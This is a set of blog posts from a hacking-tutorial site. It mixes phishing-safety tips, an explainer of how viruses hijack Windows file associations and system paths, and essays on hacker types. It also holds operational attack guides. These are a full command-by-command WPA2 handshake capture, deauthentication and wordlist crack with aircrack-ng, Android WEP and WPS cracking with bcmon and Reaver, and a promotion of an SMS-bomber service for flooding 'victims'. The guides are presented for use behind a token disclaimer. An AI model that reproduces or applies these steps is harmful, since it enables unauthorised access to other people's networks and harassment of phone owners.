  3. Beware of phone phishing schemes. Do not divulge personal information over the phone unless you initiate the call. Be cautious of emails that ask you to call a phone number to update your account information as well.
  4. Do not click on links, download files or open attachments in emails from unknown senders. It is best to open attachments only when you are expecting them and know what they contain, even if you know the sender.
  5. Never email personal or financial information, even if you are close with the recipient. You never know who may gain access to your email account, or to the person’s account to whom you are emailing.
  6. Beware of links in emails that ask for personal information, even if the email appears to come from an enterprise you do business with. Phishing web sites often copy the entire look of a legitimate web site, making it appear authentic. To be safe, call the legitimate enterprise first to see if they really sent that email to you. After all, businesses should not request personal information to be sent via email.
  7. Protect your computer with a firewall, spam filters, anti-virus and anti-spyware software. Do some research to ensure you are getting the most up-to-date software, and update them all regularly to ensure that you are blocking from new viruses and spyware.
  8. Check your online accounts and bank statements regularly to ensure that no unauthorized transactions have been made.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON matched our readers expectations regarding Phishing Attacks. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

On contrary to popular belief, Hacker’s own machines are often more vulnerable to attacks than the average user. This is especially true of those who are new to the world of hacking because of their more frequent access to remote machines, dodgy forums, open administrative privileges on their own machines and inexperience in covering their tracks etc. Further, those who are experienced often take advantage of the ones who are in the learning stage, trying to get into this field. So, for a newbie hacker, it is of vital importance to learn how to protect themselves to avoid being consumed by their own curiosity by Understanding Computer Viruses.

In this dog-eat-dog world, any kind of safety is an illusion unless proven otherwise.

Understanding Computer Viruses

Understanding Computer Viruses

Computer Viruses are the malware program that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be “infected”. Viruses are perhaps the oldest form of malicious software (Malware). They’ve been around for a long time and are still evolving and causing havoc all over the world. At first sight, they seem to be innocent looking executable files, but if opened, they can turn your world upside down in a second.

You need a basic arsenal of skills for securing the executables on your system and coping with viruses on your own. Here we discuss proactive methods you can use to defend yourself against malicious executable code in files, resources, component libraries, scripts and macros, as well as how to avoid a handful of other potential vulnerabilities.

Depending on the destructiveness power of the payload, Computer Viruses can result in a significant loss of data, time, and money. In the best scenario, you may just lose the time it takes to disinfect your computer. At worst, a mission-critical server may be reduced to little more than an expensive door-stop. Unfortunately, antivirus software isn’t perfect, and there’s always some lag between the emergence of a new electronic predator and the availability of virus definitions to protect against it. Moreover, many coders of today’s more diverse and sophisticated computer viruses are taking the preemptive step of disabling or even removing antivirus software as part of their operation.

I’m not suggesting that you shouldn’t rely on your antivirus programs for day-to-day virus protection, especially since antivirus programs are very good at keeping you safe but only from the known threats. However, if you’ve never had to fight a virus without your antivirus software, then it’s only a matter of time before you will. The main reason for this is newbie viruses. For an antivirus to be able to guard against newbie viruses, it must first be reported, the virus scanning code must be modified to include this newbie virus, and finally the virus database copy on the client side must be updated.

Because virus protection changes every day, those annoying notifications that your antivirus probably gives routinely are there to protect you. You must’ve noticed in the UPDATE menu of any antivirus an option to “Update Virus Database” or something like that. This is evidence of the ongoing war against viruses.

How do Viruses Works, In General ?

Well, first, the coder writes the executable codes required to carry out the virus’s activation process and then whatever nasty things it’s meant to do. What does the coder want from his virus to accomplish? Should it reformat your hard drive? Delete JPG files? Mail copies of itself to your friends and co-workers? Making any of this happen requires “executable” code of some kind.

Second, in order for this code to execute, the virus needs to be activated or opened. The usual way a virus’s executable code will run is the direct method: some unwary user receives an e-mail attachment called “Click-Here.exe” or something equally enticing. This runs the program and the virus is unleashed. As easily avoided as this result seems to be, it still works far more often than it should.

Virus coders have discovered a number of other, less obvious techniques for getting a virus to take over your computer. Below we take a look at some of these techniques, beginning with the question of what constitutes the executable code, then we’ll examine several sneaky activation methods. These activation methods are particularly important, as this is where you’ll understand how to completely unhook viruses from your system in order to regain control of it following an infection.

What Constitutes Executable Code ?

Of course, you know that .exe files are executable, as are other similar file formats such as .cmd and .com etc. There are many other file types that may contain executable code, and any executable code can be unsafe. In general, executable code falls into three broad categories:

  • Standalone Programs.
  • The code included within resources or libraries.
  • Script or macro code executed by an interpreter of some kind.

In a broad sense, a standalone program is pretty much any file type that relies on the operating system for it to execute. How do you know which ones these are? The answer lies in the Windows registry. To battle against viruses on their own turf, you’ll have to be very comfortable delving into the registry. So let’s take a look at how executable programs are invoked:

  1. Launch the Registry Editor by opening “Run” and type “regedit”.
  2. Expand the “HKEY_CLASSES_ROOT (HKCR)” node – It’s the operating system’s repository for information on file associations and commands and Under this HKCR, you’ll find nodes representing all the file type extensions registered on your computer.
  3. Navigate down the tree until you locate the key named “.exe”.
  4. Select this “.exe” node and observe that its default value (shown in the right-hand pane) is “exefile” – This is a pointer to another node under HKCR (the exefile key).
  5. Scroll down and find the “exefile” folder. The exefile key contains a Shell Subkey. This is where a file type’s available actions are defined. In OS terminology, these actions are known as “Verbs”. For example, a Microsoft Word document might have a “print” verb defined, which allows you to right-click the file in Windows and choose Print from the context menu.
  6. Expand the shell subkey for the “exefile” node to view the available verbs for EXE files. You’ll probably see two or three different subkeys, depending on your system. The one to be concerned with is “open”. (HCKR >> exefile >> shell >> open) Expand this node and select its command subkey. Each verb has its own subkey, and each of those keys, in turn, has its own command subkey. The default value in this subkey dictates exactly what happens when that verb is executed.

Double-clicking the file icon in Explorer has the same effect — it executes the default verb’s command (open for EXE files). As you can see, for EXE files, the open command verb has a value of %1 %* This is used in MS-DOS batch file language. The basic idea is that the path and filename of the EXE file you activated are substituted for the “%1” parameter while any switches or command-line parameters that go along with it are passed through the “%*” parameter. So it would stand to reason that any other file types whose open verb evaluates to some flavor of “%1” would tend to pose a risk. There is a number of these, and they’re all potentially dangerous. Considering that the virus coder knows that most people won’t double-click a file with a .exe extension or a .bat file, there are several other options including : .cmd, .com, .pif, .vbs – All of these file types have a default open verb of %1. A virus writer could simply change the .exe extension of his virus executable to, .com, and s/he probably just increased the chances that the unsuspecting masses will run it. Particularly dangerous is (was, actually) the humble Screen Saver file type (“.scr” extension). Close to the start of the 21st century, “.scr” viruses were literally everywhere. They were widely believed to be power-saving, which is so not true (Stand-by mode is much better). People thought it couldn’t hurt, right? so what’s the harm? So Naive. Again, extension hardly matters, everything a “.exe” virus can do, a “.scr” one can do equally as well. The days of “.scr” might be gone, but viruses are probably here to stay, Whatever the type, extension, purpose and payload – The core concepts are always the same. So, let’s take a deeper look at the working of “.scr” viruses. The key to the future lies in the past between the shadows.

In the Registry Editor, compare the open verb’s command default value for “EXE” and “SCR” files, respectively. As you will notice, they’re pretty much identical— “%1” %* for EXEs and “%1″/s for Screen Saver files. Screen savers are, as it turns out, standalone executables. The only difference between these two default verbs is a “/S” switch for the SCR file type. The intended purpose of the screen saver’s “open” verb is to allow for testing a screen saver, and the screen saver executable interprets the “/S” switch accordingly. There’s nothing to stop a virus writer from giving their application a “.scr” extension and then simply ignoring the “/S” switch passed to it when the user invokes the program. Exploiting the popularity of screen savers was even easier because the caption of the screen saver’s open verb is shown as “Test” in the right-click menu. A user thinks he’s just testing a screen saver, but what he’s actually doing is activating a virus. A particularly clever virus might even display an actual screen saver, pre-occupying you with pretty flowers while it destroys files on your hard drive in the background. This caption is stored in the default value for the open key itself. Meaning, just like you can simply find and change your “Recycle Bin’s” name to say “Dumpster” or “TrashCan”, you can also change the “Test” option to anything you like. On an unrelated note, you may also change the “Open” option for a word document to maybe “Do Belly Dance” or anything you like. Of course, this only changes the string and not what it does.(Try using the “CTRL + F”, find function to poke around and feel the power of “regedit”. Be warned, don’t change anything that you don’t know about. Changing text strings like “My Computer” is harmless, but changing some core functions code may wreck your computer before you can undo it.

Libraries Can Be Dangerous

Executable code can live inside resources or component libraries of many different varieties. These may not seem like obvious candidates for viruses, but they can certainly be exploited in that way. These file types include Dynamic Link Libraries (DLL), Control Panel Applets (CPL), various Type Libraries (TLB, OLB, and so on). This code isn’t directly executable with a “%1” command verb like .exe, but this doesn’t mean that the code can’t be run. Just about any function exported from a DLL can be invoked using a helper application called “RUNDLL32.exe”.

A virus could employ two possible attacks. One would be to replace an existing DLL with a compromised version, in which a particular function is replaced by one of the same name but with altered functionality. Then, whenever the system invokes this function, instead of having the desired result, the virus is activated instead. The second approach is simply to write a DLL from scratch and invoke its functions using RUNDLL32.EXE when needed. This isn’t quite as straightforward as invoking the code in an EXE file, but a DLL, OCX, TLB or another library file is more likely to be accepted by an unsuspecting user or to be overlooked by an antivirus program, so it may well be worth the greater effort on the virus coder’s part.

Scripts and Macros

Increased Flexibility Brings Increased Risk, Script code requires a script engine to interpret and run, but it can still be exploited. Scripts come in several forms, they may be used to perform a repetitive task, modify documents, pretty much everything that a “.exe” file can do. Microsoft has done a lot to tighten the security of these macros and scripts, but it’s still easy for a macro virus to do a lot of damage. A popular script category is Windows Script Host (WSH) files. These files, usually with .wsf, .js, or .vbs extensions, carry a default file association which causes them to be executed, no questions asked when users double-click them. As you might imagine, this can be disastrous.

Web applications may also carry dangerous scripts. Client-side scripts, for example, are fairly limited in their access to the host system for security reasons, but there’s a little-known file type, the HTML Application (with an HTA extension), which works like a client-side Web application without the same security restrictions. Its purpose is to allow developers to use their Web development skills to build rich applications using the Web browser metaphor. But again, the unsuspecting user can unleash all sorts of chaos by downloading and executing such a file without first examining its contents. All of these scripts and macros can be readily examined before they’re executed, but clearly an average user won’t bother reading some weird code.

Virus Activation Methods

The most common way for a virus to be activated is for a user to directly execute, say an e-mail attachment. Virus writers do just about anything to make you open the attachment using this action, but most developers are savvy enough not to just run an unknown executable. Of course, just about all of us have done it at one time or another—particularly now that viruses can access address books and can assemble a credible-looking e-mail message, ostensibly from someone you know and trust. Be that as it may, as users have become more aware, virus creators have gotten more devious, and there is now a host of new methods for activating a virus on a computer that doesn’t require any code to be explicitly executed (E-mail attachment viruses are a rare sight nowadays, since most email services themselves check emails for malicious files).

Registration Files

Files with an REG extension, are system registration files that hold information to be integrated into the system registry. The problem with them is that they carry a default verb of “open”. This means that if any registration file is double-clicked, it immediately dumps its contents directly into the system registry, without any confirmation required (depending on your OS). Since it has access to the registry, it is free to modify anything it pleases. It may delete vital keys required for the system to startup or even modify existing ones to make further file types vulnerable. Also, it may create a new entry for a previously unknown extension. A general antivirus may not recognize and hence ignore a file extension of for example “.bobo”. But in the registry, there could be an entry to make the file’s default action to “Open” or “Run” – giving it all the powers of a .exe file. This could be potentially devastating.

Luckily, most antivirus software nowadays is adopting the “Sandboxing” technique to run untested files. Basically, the antivirus gives the file a test run in a secure and sealed environment (sandbox) and checks if it tries to get out by, for example, trying to access something that it’s not supposed to or changing system settings and variables without asking the users explicitly. Inside the sandbox, it is denied anything remotely suspicious and the antivirus raises a big red flag and moves the file to the quarantine section (virus vault) or maybe even delete it straight away.

Path Vulnerabilities

Another hazard is something called the PATH Environment Variable. Anyone who uses a computer is bound to have used a “shortcut” file at least once. Whether it’s the “Google Chrome” icon on your desktop or maybe “WinZip” in your taskbar these shortcut files are simply links to the actual files stored in the folder in which they were installed. It’s clearly a little tedious to open “My Computer >> C: Drive >> Program Files >> Mozilla”. To open “Mozilla Firefox” every time. Hence, we have these shortcut files which simply stores the “Path” to the actual application. These files don’t exactly use the Path environment variable, but the concept is exactly the same.

The computer has certain files (example: explorer.exe) that it may routinely need to open (example: at startup). So, in the Registry, it has simply stored the name of the file it needs to open, and it’s path (in a path variable). Whenever the OS needs to open a particular system file it simply looks it up in the registry, follows the path in the memory and opens it. What does this have to do with viruses? With everything from phones to cars to houses getting smarter every moment, our computer viruses are not behind. It’s just a little too obvious and literally “on the nose” when a user clicks a file and his computer goes berserk. Once infected, our victim, although compromised is now a little wiser for he knows exactly where it went wrong. If the victim downloaded something from a website that caused damage to his system, s/he may report the website to the police. Clearly jail time is not so appealing to anyone, let alone virus programmers.

This brings us back to path vulnerabilities. Get this! The attacker needs to infect a system without making it too obvious. To do so, s/he needs a time gap between the actual infection and the attack so that it hits the victim out of the blue. We have two ways to do this by exploiting the path variable. Average users don’t really bother to sniff around system files like in the “Windows” folder (you may find this in your C: drive) and this much understandable carelessness can be exploited. The attacker can simply take two systems, one with Windows 7 and the other with XP and search for the location of (example) “winlogon.exe” – A file that is used by the OS to maintain a user session. (You may find this running in the task manager). Now in the virus file, the attacker can simply write up code to create two copies of the virus and send one to the path for Windows 7, and the other one to the path for Windows XP. (The path for the “winlogon.exe” file, which s/he searched earlier). After this, the virus can be coded to delete the file “winlogon.exe” and simply rename itself “winlogon.exe”. So, on the next startup when the OS looks up this file, it instead unleashes the virus and we’ve got BOOM. Total stealth, total annihilation and the victim have got no clue of what the hell just happened. The other way to do this is to code the virus to edit the path in the registry from its default value to where it (the virus) is stored. It can then rename itself and in this case on the next startup, the OS doesn’t even go to the actual file but instead to the virus and starts it up. Equally effective.

The Best Offense is a Strong Defense Understanding how viruses take hold is the first step in knowing how and where to untangle them from your system once it has been compromised. As viruses become more sophisticated, you can expect them to become more aggressive toward your antivirus software. So what can we do about these nefarious little beasties? We’ve come a long way. Even though the end is not in sight, the roads that lie ahead of us are shorter than the ones behind. Cyber Security today, is tighter than ever but that doesn’t mean we are immune to attacks. If you do have the latest antivirus software and keep your OS updated, you probably don’t need to worry about 99% of all the malicious software out there, but the remaining 1% is the reason why cyber security is a $100 billion market today. Successful attacks are rarer today than ten years ago, but they certainly make up for it in sheer intensity. More and more people each day are relying more and more on their computers, not knowing that simply entering their credit card information on a secure website could be sending all those details to a hacker. Attacks and infections are decreasing in number, but rising in destructiveness. Today, almost nobody bothers to spread around a virus that simply causes reboots or wipes data, since there’s no real gain for the hacker in it. The malicious software today are much more targeted. Clearly, obtaining someone’s social security number or bank pin is much more valuable to a hacker than deleting some random person’s movies and pictures.

The only thing we can do is keep our eyes open and turn around at the slightest hint of trouble. Avoid downloading from unconfirmed sources and make sure your antivirus software and OS is updated. Even if your system is compromised you may never actually know it, but the hacker could have identified that you are an easy target. If just once he could get valuable information from your system, it’s very likely that he will keep the system compromised, silently (make it a slave). Further, make sure to never ever store sensitive or financial information on your computer. Keeping it on an offline system or an external hard drive is much safer.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON matched our readers expectations regarding Virology – Understanding Computer Viruses. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

Hacker is a term used by some to mean “A Clever Programmer” and by others, especially those in popular media, to mean “Someone Who Tries To Break Into Computer Systems”. The term “Hacking” historically referred to constructive, clever technical work that was not necessarily related to computer systems. Today, however, hacking and hackers are most commonly associated with malicious programming attacks on the Internet and another network and that makes a perfect reason to know about the different Types Of Hacker.

Types Of Hacker

Let’s Understand The Different Types Of Hacker & Their Work Culture:

1# White Hat Hacker:

The term “White Hat Hacker” in Internet slang refers to an ethical computer Hacker, or a Computer Security Expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization’s information systems. White Hats are the good guys who hack for security purposes. Although what they do is pretty much the same as bad guys, but a world of difference arises when it comes to ethics. The main aim of a White Hat Hacker is to improve the security of a system by finding security flaws and fixing it before the bad guys to find and exploit it. They are usually officially employed by organizations and companies to protect their virtual assets from coming to harm. They may work also individually to make the cyberspace more secure, kind of a voluntary worldwide community service.

2# Black Hat Hacker:

A Black Hat Hacker (Also known as Crackers or Dark-Side Hackers) are an individual with extensive computer knowledge whose purpose is to breach or bypass internet security. The general view is that, while hackers build things, crackers break things. They are the bad guys, cyber criminals who have malicious intents. These are the hackers who steal money or valuable data, infect systems with Viruses, Trojans, and Malware etc. These are the ones who gave the world of hacking a bad reputation and it is up to us, the White Hats to bring them down. They use their hacking skills for illegal purposes with unethical goals and sometimes just to watch the world burn.

3# Grey Hat Hacker:

The term “Grey Hat Hacker” in Internet slang, refers to a Computer Hacker or Computer Security Expert whose ethical standards fall somewhere between purely altruistic and purely malicious. The term began to be used in the late 1990s, derived from the concepts of “White Hat” and “Black Hat” Hackers. These are the hackers who may work offensively or defensively, depending on the situation. They belong to the neutral zone. These types of hackers are not inherently malicious with their intentions; they’re just looking to get something out of their discoveries for themselves. Usually, Grey Hat Hackers never exploit the found vulnerabilities. However, this type of hacking is still considered illegal because the hacker did not receive permission from the owner prior to attempting to attack the system.

4# Hacktivist:

Hacktivist (A portmanteau of Hack and Activist) is the subversive use of computers and computer networks to promote a political agenda. With roots in hacker culture and hacker ethics, its ends are often related to the free speech, human rights, or freedom of information movements. These are the hackers who use their hacking skills for protesting against injustice and attack a target system or websites to popularize a notion or gather attention to a specific case for rectification. They are vigilantes, the dark knights of the Hacking Universe. This is where good intentions collide with the law, for Hacktivists may or may not carry out illegal activities to get their point across to the world. They include outlaws who deliver their own brand of rough justice; they are usually experts confident in their stealth skills so as not to get caught.

5# Script Kiddies:

Script Kiddies (Also known as Skid/Skiddie/Script Bunny), In programming and hacking culture, a script kiddie is an unskilled individual who uses scripts or programs developed by others to attack computer systems and networks and deface websites. In a word, we can say them noobs. They are the ones who don’t know how a system works but are still able to exploit it with previously available tools, not by walking in the footsteps of actual Hackers but simply copying what they did and using it for malicious purposes. A script kiddie is that one annoying kid in class, who pisses off everyone else. So don’t ever try to be a Skid.

Hope we’ve provided the best explanations for the types of hackers. So, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

Traditionally, a hacker is someone who likes to tinker with software or electronic systems. Hackers enjoy exploring and learning how computer systems operate. They love discovering new ways to work electronically. So Here in HACKAGON, we’ll tell you What Is Hacking and the misconceptions about it.

What Is Hacking

What Is Hacking ?

Technically, Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator’s original purpose. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a Hacker. In the cyber security world, the person who is able to discover a weakness in the system and manages to exploit it to accomplish his goal (Good or Bad) is referred as a Hacker, and the process is referred as Hacking.

Computer hacking is the most popular form of hacking nowadays, especially in the field of computer security, but hacking exists in many other forms, such as phone hacking, brain hacking, etc. and it’s not limited to either of them. Nowadays, People think that hacking is only hijacking Facebook accounts or defacing websites. Yes, it is also part of the hacking field but it doesn’t mean that it is all there is. This is not even the tip of the iceberg.

What does the term Hacking exactly means and what should you do to become a Hacker? That is exactly what we are going to discuss here in HACKAGON.

Ethical Hacking (Also known as Penetration Testing or White-Hat Hacking) Involves the same tools, tricks, and techniques that Black Hat Hackers use, but with one major difference: Ethical hacking is legal. Ethical hacking is performed with the target’s permission. The intent of ethical hacking is to discover vulnerabilities from a hacker’s viewpoint so systems can be better secured. It’s part of an overall information risk management program that allows for ongoing security improvements. Ethical hacking can also ensure that vendors’ claims about the security of their products are legitimate. The only thing you need to become a hacker is interest and dedication. You should always be ready to learn something new and learn to create something newer.

Hacking is the practice of modifying the features of a system or finding a loophole, in order to accomplish a goal outside of the creator’s original purpose but due to the mass attention given to the so-called “Blackhats” or “Crackers” from the media, the reputation of all hackers, even the good ones is damaged. This is what HACKAGON is for – To turn this image around. Hacking is always viewed as something illegal and shrewd. This is almost never the case. A few bad guys doing a few bad things have put a bad name on an entire community.

So, we hope that we provided some healthy and hygienic knowledge about Hacking so that readers can begin their Hacking career with proper ethics. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

WiFi is getting so much essential as days are passing but WPA2-PSK may not be as safe as you think. There are a few attacks against WAP2-PSK. One of the most common attacks is against WPA2 is exploiting a weak passphrase and that’s sometimes also called Dictionary Attack. So Let’s see How to Hack WPA2-PSK WiFi Password Using Linux.

Cracking WPA2 wifi password is not really an easy task to do, you can’t crack it with a mouseclick as they show in movies and there is no software that will give you the password without some hard work but you don’t worry HACKAGON can show you how to crack it with few easy steps and we will do it using aircrack-ng.

Hack WPA2-PSK WiFi Password Using Linux Hackagon

When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy (WEP) was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that’s very difficult to crack—but not impossible.

The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.

Also Read ==> Top 12 wifi hacking app for Android
Also Read ==> 2 Best Methods to Hack Wi-Fi using Android Phones

Requirements: To Hack WPA2-PSK WiFi Password Using Linux

  1. Kali Linux or any Pentesting Linux Distros with aircrack-ng installed in it. if you don’t have aircrack-ng suite get it by this command in terminal sudo apt-get install aircrack-ng
  2. A Wireless Network Adapter that support monitor mode like Alfa 2W AWUS036NH, Alfa AWUS036H, wifiy-city 56G, or you can check this page here for card compatibility by clicking on >> Compatibility Drivers.
  3. A wordlist comprising of all the possible different combination of pass-phrases.

Let’s See How To Hack WPA2-PSK WiFi Password Using Linux

1) open up your Root Terminal as root and type ifconfig this will show you all the networking interfaces connected to your device.

ifconfig Hackagon

if your wireless network adapter is working fine you should see the “wlan0” the name may change if you have more than one connected wireless adapter.

2) Now to start monitor mode type airmon-ng start wlan0.

airmon-ng is a traffic monitoring tool.
wlan0 is your Wireless Interface.

After this command, It’ll start the monitor mode.

airmon-ng Hackagon

As it’s seen the monitor mode is working under “wlan0mon“, So this is your card name for now.

We can see there is a list of Process ID’s (PID) and that will cause trouble during the process so we’ll kill those processes by typing “kill <pid>” in my case, it is “kill 1210 1341 1591 1592“.

kill terminal command hackagon

3) To show the list of available WiFi Network Type airodump-ng wlan0mon.

airodump-ng is a WiFi Packet Capturing Tool.
wlan0mon is my Monitoring Interface.

airodump-ng Hackagon

airodump-ng will start capturing all packets.

airodump-ng captured packets hackagon

From the captured packets select your target and note its ‘BSSID‘ (BSSID = Base Service Set Identifier) and ‘Channel‘. Then stop the capture using “ctrl+c“.

4) Start capturing the packets of your target network by typing airodump-ng -c -w –bssid wlan0mon and in my case, it is airodump-ng -c 1 -w HACKAGONwpa2 –bssid 74:DA:38:24:CF:34 wlan0mon.

Captured WiFi Packets Hackagon

This will start capturing the packets and if you get the handshake then you won’t need the aireplay-ng command but in case if you don’t get the handshake while capturing of packets goes on, open a new terminal as root and type aireplay-ng -0 0 -a mon0.

aireplay-ng => Tool for Deauthentication, Fake Authentication, and Other Packet Injections.
-0 => Number Associated for Deauthentication.
0 => Deauth Count.
-a => bssid here we are trying to send a deauthentication request.
In my case, the command looks like aireplay-ng -0 0 -a 74:DA:38:24:CF:34 wlan0mon.

aireplay-ng deauth hackagon

After few seconds stop it using ‘Ctrl+c‘.
Now after we have successfully captured the WPA handshake it’ll look like:

WPA Handshake Hackagon

5) Stop the capture using ‘Ctrl+c‘ and type ‘ls‘ that would bring up all the current directories and files.

WiFi Captured Files Hackagon

Now, Select the file with ‘.cap‘ extension and type aircrack-ng -w
aircrack-ng=> Tool that helps in cracking the password.
In my case, the command looks like aircrack-ng -w /usr/share/wordlists/rockyou.txt ‘/root/HACKAGONwpa2-01.cap’.

aircrack-ng hackagon

Now it starts finding suitable passphrase.

WPA2 Passphrase Hackagon

And now all you have to do is to wait till you see the lovely news (KEY Found).

Summing Up All Step in few lines:

  1. ifconfig
  2. airmon-ng start wlan0
  3. airodump-ng wlan0mon
  4. airodump-ng -c 1 -w HACKAGONwpa2 –bssid 74:DA:38:24:CF:34 wlan0mon
  5. aireplay-ng -0 0 -a 74:DA:38:24:CF:34 wlan0mon
  6. aircrack-ng -w /usr/share/wordlists/rockyou.txt ‘/root/HACKAGONwpa2-01.cap’

Also Read ==> Top 12 wifi hacking app for Android
Also Read ==> 2 Best Methods to Hack Wi-Fi using Android Phones

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.

Hack WiFi using Android Phones

We’re living in an electronically digitized world, where the combination of WiFi Networks and Android is very common habits. WiFi network is actually a helpful option for wireless connection to the internet with the use of radio-wave of 2.4 GHz and 5 GHz SHF (Super High Frequencies). WiFi sometimes also known as Wireless Local Area Network (WLAN) and most modern WLANs are based on IEEE 802.11 standards, marketed under the Wi-Fi brand name. There is 99.9% chance for any password protected WiFi network to be hacked.

Hack WiFi using Android Phones

Also Read ==> Top 12 wifi hacking app for Android
Also Read ==> Hack WPA2-PSK WiFi Password Using Linux

So, Today We Come Up With The 2 Best Methods To Hack WiFi Using Android Phones:

Method 1# WEP Routers:

  1. Root a compatible device: Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset, and must be rooted. The Cyanogen ROM will offer the best chance of success. Some of the known supported devices include:
  • Nexus 7
  • Galaxy S1/S2/S3/S4/S5
  • Galaxy y
  • Nexus One
  • Desire HD
  • Micromax A67
  1. Download and install bcmon: Download the app by clicking on “bcmon APK“. This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. To install an APK file, you’ll need to allow installation from unknown sources in your Security Menu so:
  • Press the Menu button on your phone and tap Settings.
  • Scroll down to Security and tap it to open the Security Menu.
  • Scroll down and check the “Unknown Sources” box.
  • This will let you install apps directly from the APK file.
  1. Run bcmon: After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the “Enable Monitor Mode” option. If the app crashes, open it and try again. If it fails for the third time, your device is most likely not supported.
  • Your device must be rooted in order to run bcmon.
  1. Tap “Run bcmon terminal”: This will launch a terminal like most of the Linux terminals. Type airodump-ng and tap the Enter Airodump will load, and you will be taken to the command prompt again. Type airodump-ng wlan0 and tap the Enter button.
  1. Identify the access point you want to crack: You will see a list of available access points. You must select an access point that is using WEP encryption.
  1. Note the MAC address that appears: This is the MAC address for the router. Make sure that you have the right one if there are multiple routers listed. Note down this MAC address.
  • Also, note down the Channel that the access point is broadcasting on.
  1. Start scanning the channel: You will need to collect information from the access point for several hours before you can attempt to crack the password. Type airodump-ng -c channel# –bssid MAC address -w output ath0 and tap Enter. Airodump will begin scanning. You can leave the device for a while as it scans for information. Be sure to plug it in if you are running low on battery.
  • Replace channel# with the channel number the access point is broadcasting on (e.g. –c 6).
  • Replace MAC address with the MAC address of the router (e.g –bssid 00:0a:95:9d:68:16)
  • Keep scanning until you reach at least 20,000 – 30,000 packets.
  1. Crack the password: Once you have a suitable number of packets, you can start attempting to crack the password. Return to the terminal and type aircrack-ng output*.cap and tap Enter.
  1. Note the hexadecimal password when finished: After the cracking process is complete (which could take several hours), the message Key Found! Will seem, followed by the key in the hexadecimal form. Make sure that “Probability” is 100% or the key will not work.
  • When you enter the key, enter it without the “:“. For example, if the key was 12:34:56:78:90, you would enter 1234567890.


Method #2 WPA2 WPS Routers:

  1. Root a compatible device: Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset, and must be rooted. The Cyanogen ROM will offer the best chance of success. Some of the known supported devices include:
  • Nexus 7
  • Galaxy Ace/S1/S2/S3
  • Nexus One
  • Desire HD
  1. Download and install bcmon: Download the app by clicking onbcmon APK“. This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. To install an APK file, you’ll need to allow installation from unknown sources in your Security Menu so:
  • Press the Menu button on your phone and tap Settings.
  • Scroll down to Security and tap it to open the Security Menu.
  • Scroll down and check the “Unknown Sources” box.
  • This will let you install apps directly from the APK file.
  1. Run bcmon: After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the “Enable Monitor Mode” option. If the app crashes, open it and try again. If it fails for the third time, your device is most likely not supported.
  • Your device must be rooted in order to run bcmon.
  1. Download and install Reaver: Download the app by clicking on “Reaver App“. Reaver App is a program developed to crack the WPS PIN to retrieve the WPA2 passphrase.
  1. Launch Reaver: Tap the “Reaver for Android” icon in your App drawer. After confirming that you are not using it for illegal purposes, Reaver will scan for available access points. Tap the access point you want to crack to continue.
  • You may need to verify Monitor Mode before proceeding. If this is the case, bcmon will open again.
  • The access point you select must accept WPS authentication. Not all routers support this.
  1. Verify your settings: In most cases you can leave the settings that appear at their default. Make sure that the “Automatic advanced settings” box is checked.
  1. Start the cracking process: Tap the “Start attack” button at the bottom of the Reaver Settings menu. The monitor will open and you will see the results of the ongoing crack displayed.
  • Cracking WPS can take anywhere from 2-10+ hours to complete, and it is not always successful.

Also Read ==> Top 12 wifi hacking app for Android
Also Read ==> Hack WPA2-PSK WiFi Password Using Linux


Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and feel free to drop a comment below if you still face any kind of problem.

SMS Bomber

Prank your Friends by Sending continuous messages to them with SMS Bomber. As of in many situations, you want to disturb or irritate your friends or relatives. So in that case, you need this post to bombard the messages on their cell phones inbox.

sms bomber

So, for bombarding messages on your behalf, an amazing SMS Bomber is developed by WIZBLOGGER group. You can make victims cell phone flooded with messages by entering their phone number in the form of their website.

How to use SMS Bomber:

  1. First of all, Visit the website by clicking on SMS BOMBER.
  2. Now, enter your Friend’s Phone Number there.
  3. Then, enter number of SMS as much as you want to send (Maximum 100 SMS per Time).
  4. Then Click on SUBMIT button as shown in the screenshot below.

sms bomber

Features Of SMS Bomber:

  1. Completely free. You don’t have to pay a single penny to bomb your friends/victims.
  2. Super fast speed. Even if you send 100 SMS it will take only a few seconds to complete the request
  3. Works awesome. No delays in between SMS.
  4. Works on DND activated sim also.
  5. Works on all Indian mobile numbers.
  6. Can send up to 100 SMS per go.

Some Rules for using the facility: For the security reasons, you need to follow the following rules:

  • You agree that you will not use this trick for any illegal purpose.
  • You can only send max 100 SMS to one person.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.